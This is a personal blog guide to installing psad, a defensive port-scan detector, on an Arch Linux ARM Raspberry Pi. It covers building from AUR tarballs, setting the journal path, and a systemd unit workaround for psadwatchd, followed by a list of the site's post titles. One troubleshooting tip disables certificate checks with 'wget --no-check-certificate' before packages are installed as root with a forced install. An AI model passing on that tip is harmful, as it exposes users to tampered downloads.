
Many of my solutions are hacks and probably suboptimal hacks at that. If you see anything wrong with this guide or have better solutions to the problems I covered here, feel free to contact me at cmyagema@syr.edu.

Other Useful Resources

psad homepage
An installation guide that helped me (Edit: This blog no longer exists)
A guide on configuring psad

Installing psad for ARM from AUR

Since psad is not included in the main Arch Linux repositories, it has to be downloaded, compiled, and built from the AUR repository.

First, create a file (I will name it "list.txt") and write in it the following URLs:

https://aur.archlinux.org/packages/pe/perl-unix-syslog/perl-unix-syslog.tar.gz
https://aur.archlinux.org/packages/pe/perl-iptables-parse/perl-iptables-parse.tar.gz
https://aur.archlinux.org/packages/pe/perl-iptables-chainmgr/perl-iptables-chainmgr.tar.gz
https://aur.archlinux.org/packages/ps/psad/psad.tar.gz

These are the tarballs which we will need from AUR.

Next, run the following commands to untar the tarballs, build them, and install them:

cat list.txt | xargs wget
tar xzvf perl-iptables-parse.tar.gz
cd perl-iptables-parse
makepkg -Acs
sudo pacman -U perl-iptables-parse-1.1-2-any.pkg.tar.xz
cd ..
tar xzvf perl-unix-syslog.tar.gz
cd perl-unix-syslog
makepkg -Acs
sudo pacman -U perl-unix-syslog-1.1-4-any.pkg.tar.xz
cd ..
tar xzvf perl-iptables-chainmgr.tar.gz
cd perl-iptables-chainmgr
makepkg -Acs
sudo pacman -U perl-iptables-chainmgr-1.2-2-any.pkg.tar.xz
cd ..
tar xzvf psad.tar.gz
cd psad
makepkg -Acs
sudo pacman -U --force psad-2.2.3-1-armv6h.pkg.tar.xz

Now if you are lucky, unlike me, this should be all you have to do. However, I ran into many additional problems which is what I will focus on in the next section.

Configuration

As I mentioned earlier, I am not going to cover how to configure psad. There is, however, one configuration which I will mention because it's different from other systems. Namely, the location for syslog is in an usual location because of how systemd logs.

To fix this setting, list the contents of your /var/log/journal/ directory. You should see a directory containing a bunch of letters and numbers and inside that directory should be a file called system.journal. I found that this is the file which psad has to be pointed to.

Once you have identified this path, open /etc/psad/psad.conf and point IPT_SYSLOG_FILE to this file. In my case, this means:

IPT_SYSLOG_FILE /var/log/journal/37ed4fd73b0c416886710f1c8ffa083b/system.journal;

If you want to try port scanning yourself or in general test your psad installation, be mindful that the raspberry pi has very limited computing resources so it might take awhile for your test to reflect in psad's status.

Troubleshooting

wget fails due to certificates

This one is easy, just replace the cat link | xargs wget with cat link | xargs wget --no-check-certificate.

makepkg fails and returns a build error

Try rebooting the raspberry pi. Sometimes not having enough memory can cause the build to fail.

psad is installed, but when I run `sudo psad -S` I get the message `pid file [...]/psadwatchd.pid does not exist`

If you're seeing this towards the top of the output for sudo psad -S:

[-] psad: pid file /var/run/psad/psadwatchd.pid does not exist for psadwatchd on HOSTNAME

Then you probably have the same problem I had.

This was the most painful of the problems I ran into and this was the problem which was big enough to convince me to write this document. If I hadn't ran into this issue (and the systemd logging issue), I wouldn't have bothered writing any of this. The problem in my case was "psadwatchd" wasn't starting for some reason when "psad" started. To confirm this as the source of the problem, run:

ps -A | grep "psad"

If you only see one process called "psad" and no "psadwatchd", then you're having the same problem as me.

The solution I came up for this is very much a hack, but it works decently. Basically, I got around this by making a separate service for psadwatchd.

First, create a new file: /etc/systemd/system/psadwatchd.service

In this file, write:

[Unit]
Description=Port scan attack detector daemon
After=psad.service
[Service]
ExecStart=/usr/sbin/psadwatchd
Type=oneshot
RemainAfterExit=yes
[Install]
WantedBy=multi-user.target

Next, confirm that you wrote this service file correctly by starting it in systemctl:

sudo systemctl start psadwatchd

If all went as it should, you should be able to execute the following two commands:

ps -A | grep "psad"
sudo psad -S

The first command should return both a psad process and a psadwatchd process. The second command should now show information on psadwatchd and no longer show an error about missing PID files.

Now that you've made a working psadwatchd service file, add this new service to systemd's startup list:

sudo systemctl enable psadwatchd

And that should be it (hopefully).

Carter Yagemann

AI Psychiatry to Appear in USENIX'24

CheatFighter to Appear in RAID'23

A Practical Beginner's Guide to Intel Processor Trace

Background: What is Intel PT?

Getting Started: Linux Perf

Additional Noteworthy Tricks

Further Reading

VulChecker Accepted to USENIX 2023

PUMM Accepted to USENIX 2023

Differentiating ARCUS (USENIX'21) and Bunkerbuster (CCS'21)

ARCUS' Story

Bunkerbuster's Story

Timeline and Publication Logistics

Conclusion

Update Regarding Halibut Bugs (CVE-2021-42612, CVE-2021-42613, CVE-2021-42614)

Faculty Position at The Ohio State University

Case Study: Security Analysis of Halibut

Environment

Double Free in cleanup_index() in index.c

Use-After-Free in cleanup_index() in index.c

Use-After-Free in info_width_internal() in bk_info.c

Root Cause

Bunkerbuster to Appear in CCS'21

MARSARA to Appear in CCS'21

"Modeling Large-Scale Manipulation in Open Stock Markets" to Appear in IEEE Security & Privacy

ARCUS System and Dataset Released

Vulnerability Root Cause Analysis Approach "ARCUS" to Appear in USENIX'21

"Justitia" Biometric Privacy to Appear in ASIACCS'21

"Bot2Stock" to Appear in ACSAC'20

New CVE Published (CVE-2020-14931)

H&R Block App Analytics for 2020

Results

Comparison to 2019

Discussion

Fuzzers Suck: New 0-Day Shows We Need To Do Better

New CVE Published (CVE-2020-9549)

New PoC Published to Exploit-DB (EDB-ID-47254)

A Beginner's Guide to Hacking Video Game Save States (Fire Emblem 7 on the GBA)

A Primer on Emulators & Save States

Reverse Engineering John GBA's Save State Format

Differential Analysis

Creating Save States

The Analysis

Modifying a Save State

The Result

Conclusion

MLSploit Extended Abstract to Appear in KDD 2019

Barnum Paper to Appear in Information Security Conference 2019 (ISC'19)

Extended Abstract to Appear in CVPR-19 Workshop on Explainable AI

H&R Block App Analytics for 2019

Results

Comparison to 2018

Discussion

Android Intent Firewall Documentation

Malware Has a Color

Visualization Technique

Other Examples

Upcoming MLsploit Demo at Black Hat Asia 2019

Three Kinds of Document Malware and Designing Frameworks to Detect Them

Phishing-based

Abuse-based

Exploit-based

Mention for Georgia Tech Vulnerability Disclosure

The Unfortunate Economics of Defense in Depth

Paper Accepted to ACM CCS 2018

Weird Things Are Afoot In The Honeypot

EFF and EFAIL: An Example of Hype Culture Gone Awry

Debian Apt Repo for libipt

H&R Block "MyBlock" App + USA Government Website Analytics = PROFIT

Results

Discussion

Future Work

How ASLR Helps Enable Exploits (CVE-2013-2028)

Intel PT Data at Rest: A Compression Experiment

Procedure

Results

Discussion

Windows _EX_FAST_REF Pointers and Virtual Machine Introspection

You never know where your code will end up.

Double Free in `cleanup_index()` in `index.c`

Use-After-Free in `cleanup_index()` in `index.c`

Use-After-Free in `info_width_internal()` in `bk_info.c`